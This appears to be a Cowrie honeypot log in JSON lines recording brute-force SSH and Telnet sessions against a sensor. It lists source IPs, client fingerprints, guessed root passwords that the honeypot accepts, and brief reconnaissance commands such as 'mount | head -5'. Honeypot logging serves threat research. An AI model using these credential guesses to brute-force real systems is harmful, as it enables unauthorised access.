{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-24T16:07:19.672808Z","src_ip":"45.88.8.215","session":"c07258e1a882"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":false,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:07:21.002906Z","src_ip":"45.88.8.215","session":"c07258e1a882"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:07:21.004121Z","src_ip":"45.88.8.215","session":"c07258e1a882"}
{"eventid":"cowrie.session.connect","src_ip":"113.11.86.219","src_port":43840,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b04853b6f56","protocol":"telnet","message":"New connection: 113.11.86.219:43840 (1.2.3.4:23) [session: 2b04853b6f56]","sensor":"my-vps","timestamp":"2025-08-24T16:11:10.759135Z"}
{"eventid":"cowrie.session.closed","duration":31.12253975868225,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:11:41.880934Z","src_ip":"113.11.86.219","session":"2b04853b6f56"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53848,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf7fdb6f2cd2","protocol":"ssh","message":"New connection: 217.72.205.35:53848 (1.2.3.4:22) [session: bf7fdb6f2cd2]","sensor":"my-vps","timestamp":"2025-08-24T16:13:06.009403Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:13:06.011937Z","src_ip":"217.72.205.35","session":"bf7fdb6f2cd2"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.212.63","src_port":48154,"dst_ip":"1.2.3.4","dst_port":23,"session":"a1b5640ac9a5","protocol":"telnet","message":"New connection: 49.247.212.63:48154 (1.2.3.4:23) [session: a1b5640ac9a5]","sensor":"my-vps","timestamp":"2025-08-24T16:14:35.032012Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":58780,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc6594e98d15","protocol":"ssh","message":"New connection: 213.108.243.7:58780 (1.2.3.4:22) [session: cc6594e98d15]","sensor":"my-vps","timestamp":"2025-08-24T16:14:41.262831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:14:41.263775Z","src_ip":"213.108.243.7","session":"cc6594e98d15"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T16:14:41.368390Z","src_ip":"213.108.243.7","session":"cc6594e98d15"}
{"eventid":"cowrie.login.success","username":"root","password":"max+666","message":"login attempt [root/max+666] succeeded","sensor":"my-vps","timestamp":"2025-08-24T16:14:41.701861Z","src_ip":"213.108.243.7","session":"cc6594e98d15"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T16:14:41.972303Z","src_ip":"213.108.243.7","session":"cc6594e98d15"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-24T16:14:41.973223Z","src_ip":"213.108.243.7","session":"cc6594e98d15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:14:42.082778Z","src_ip":"213.108.243.7","session":"cc6594e98d15"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:14:42.083928Z","src_ip":"213.108.243.7","session":"cc6594e98d15"}
{"eventid":"cowrie.login.success","username":"root","password":"00000000","message":"login attempt [root/00000000] succeeded","sensor":"my-vps","timestamp":"2025-08-24T16:14:45.317783Z","src_ip":"49.247.212.63","session":"a1b5640ac9a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T16:14:45.336763Z","src_ip":"49.247.212.63","session":"a1b5640ac9a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"4.7","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:14:50.033561Z","src_ip":"49.247.212.63","session":"a1b5640ac9a5"}
{"eventid":"cowrie.session.closed","duration":15.005138397216797,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:14:50.037088Z","src_ip":"49.247.212.63","session":"a1b5640ac9a5"}
{"eventid":"cowrie.session.connect","src_ip":"121.179.188.151","src_port":37033,"dst_ip":"1.2.3.4","dst_port":23,"session":"fef925e98222","protocol":"telnet","message":"New connection: 121.179.188.151:37033 (1.2.3.4:23) [session: fef925e98222]","sensor":"my-vps","timestamp":"2025-08-24T16:17:35.206965Z"}
{"eventid":"cowrie.session.closed","duration":34.46783661842346,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:18:09.674716Z","src_ip":"121.179.188.151","session":"fef925e98222"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56596,"dst_ip":"1.2.3.4","dst_port":22,"session":"18785090a8e3","protocol":"ssh","message":"New connection: 217.72.205.35:56596 (1.2.3.4:22) [session: 18785090a8e3]","sensor":"my-vps","timestamp":"2025-08-24T16:19:38.826163Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:19:38.827376Z","src_ip":"217.72.205.35","session":"18785090a8e3"}
{"eventid":"cowrie.session.connect","src_ip":"220.132.125.36","src_port":51257,"dst_ip":"1.2.3.4","dst_port":23,"session":"845482216897","protocol":"telnet","message":"New connection: 220.132.125.36:51257 (1.2.3.4:23) [session: 845482216897]","sensor":"my-vps","timestamp":"2025-08-24T16:22:57.144816Z"}
{"eventid":"cowrie.session.closed","duration":30.65373730659485,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:23:27.798471Z","src_ip":"220.132.125.36","session":"845482216897"}
{"eventid":"cowrie.session.connect","src_ip":"87.121.84.85","src_port":44408,"dst_ip":"1.2.3.4","dst_port":23,"session":"3a2cf3f456df","protocol":"telnet","message":"New connection: 87.121.84.85:44408 (1.2.3.4:23) [session: 3a2cf3f456df]","sensor":"my-vps","timestamp":"2025-08-24T16:24:47.929008Z"}
{"eventid":"cowrie.session.closed","duration":7.824523448944092,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:24:55.753463Z","src_ip":"87.121.84.85","session":"3a2cf3f456df"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":47210,"dst_ip":"1.2.3.4","dst_port":22,"session":"64b83f244d19","protocol":"ssh","message":"New connection: 45.88.8.186:47210 (1.2.3.4:22) [session: 64b83f244d19]","sensor":"my-vps","timestamp":"2025-08-24T16:25:25.368798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:25:25.900151Z","src_ip":"45.88.8.186","session":"64b83f244d19"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T16:25:25.900847Z","src_ip":"45.88.8.186","session":"64b83f244d19"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456@","message":"login attempt [root/a123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-24T16:25:29.225599Z","src_ip":"45.88.8.186","session":"64b83f244d19"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:25:30.183014Z","src_ip":"45.88.8.186","session":"64b83f244d19"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58416,"dst_ip":"1.2.3.4","dst_port":22,"session":"36dc44fdfce9","protocol":"ssh","message":"New connection: 217.72.205.35:58416 (1.2.3.4:22) [session: 36dc44fdfce9]","sensor":"my-vps","timestamp":"2025-08-24T16:26:31.217284Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:26:31.218623Z","src_ip":"217.72.205.35","session":"36dc44fdfce9"}
{"eventid":"cowrie.session.connect","src_ip":"147.185.132.195","src_port":64110,"dst_ip":"1.2.3.4","dst_port":22,"session":"669758f92273","protocol":"ssh","message":"New connection: 147.185.132.195:64110 (1.2.3.4:22) [session: 669758f92273]","sensor":"my-vps","timestamp":"2025-08-24T16:29:35.503402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-24T16:29:36.519419Z","src_ip":"147.185.132.195","session":"669758f92273"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-24T16:29:37.449925Z","src_ip":"147.185.132.195","session":"669758f92273"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:29:44.280554Z","src_ip":"147.185.132.195","session":"669758f92273"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":52514,"dst_ip":"1.2.3.4","dst_port":22,"session":"7308e7543ef1","protocol":"ssh","message":"New connection: 45.88.8.215:52514 (1.2.3.4:22) [session: 7308e7543ef1]","sensor":"my-vps","timestamp":"2025-08-24T16:32:39.501850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:32:40.555789Z","src_ip":"45.88.8.215","session":"7308e7543ef1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T16:32:40.556839Z","src_ip":"45.88.8.215","session":"7308e7543ef1"}
{"eventid":"cowrie.login.success","username":"root","password":"Abey@123","message":"login attempt [root/Abey@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T16:32:43.054782Z","src_ip":"45.88.8.215","session":"7308e7543ef1"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:32:43.622402Z","src_ip":"45.88.8.215","session":"7308e7543ef1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64208,"dst_ip":"1.2.3.4","dst_port":22,"session":"a65b181a92cf","protocol":"ssh","message":"New connection: 217.72.205.35:64208 (1.2.3.4:22) [session: a65b181a92cf]","sensor":"my-vps","timestamp":"2025-08-24T16:33:19.019207Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:33:19.020497Z","src_ip":"217.72.205.35","session":"a65b181a92cf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55782,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec9f4f0122e9","protocol":"ssh","message":"New connection: 217.72.205.35:55782 (1.2.3.4:22) [session: ec9f4f0122e9]","sensor":"my-vps","timestamp":"2025-08-24T16:39:55.480540Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:39:55.481694Z","src_ip":"217.72.205.35","session":"ec9f4f0122e9"}
{"eventid":"cowrie.session.connect","src_ip":"113.236.68.216","src_port":58998,"dst_ip":"1.2.3.4","dst_port":23,"session":"b7aa2f6badff","protocol":"telnet","message":"New connection: 113.236.68.216:58998 (1.2.3.4:23) [session: b7aa2f6badff]","sensor":"my-vps","timestamp":"2025-08-24T16:43:38.149483Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.236.68.216","src_port":59029,"dst_ip":"1.2.3.4","dst_port":23,"session":"342e485183dd","protocol":"telnet","message":"New connection: 113.236.68.216:59029 (1.2.3.4:23) [session: 342e485183dd]","sensor":"my-vps","timestamp":"2025-08-24T16:43:39.244446Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.236.68.216","src_port":59083,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c2da55d4445","protocol":"telnet","message":"New connection: 113.236.68.216:59083 (1.2.3.4:23) [session: 8c2da55d4445]","sensor":"my-vps","timestamp":"2025-08-24T16:43:41.148882Z"}
{"eventid":"cowrie.session.closed","duration":31.120853900909424,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:44:09.270262Z","src_ip":"113.236.68.216","session":"b7aa2f6badff"}
{"eventid":"cowrie.session.closed","duration":31.08604621887207,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:44:10.330380Z","src_ip":"113.236.68.216","session":"342e485183dd"}
{"eventid":"cowrie.session.closed","duration":31.176639795303345,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:44:12.325447Z","src_ip":"113.236.68.216","session":"8c2da55d4445"}
{"eventid":"cowrie.session.connect","src_ip":"167.172.43.167","src_port":34298,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb168dd07e89","protocol":"ssh","message":"New connection: 167.172.43.167:34298 (1.2.3.4:22) [session: eb168dd07e89]","sensor":"my-vps","timestamp":"2025-08-24T16:45:17.708079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:45:17.709236Z","src_ip":"167.172.43.167","session":"eb168dd07e89"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T16:45:17.725902Z","src_ip":"167.172.43.167","session":"eb168dd07e89"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T16:45:25.708620Z","src_ip":"167.172.43.167","session":"eb168dd07e89"}
{"eventid":"cowrie.session.connect","src_ip":"34.207.152.248","src_port":19742,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b7738bfbbfd","protocol":"ssh","message":"New connection: 34.207.152.248:19742 (1.2.3.4:22) [session: 7b7738bfbbfd]","sensor":"my-vps","timestamp":"2025-08-24T16:46:34.964889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T16:46:36.572832Z","src_ip":"34.207.152.248","session":"7b7738bfbbfd"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-24T16:46:36.573628Z","src_ip":"34.207.152.248","session":"7b7738bfbbfd"}
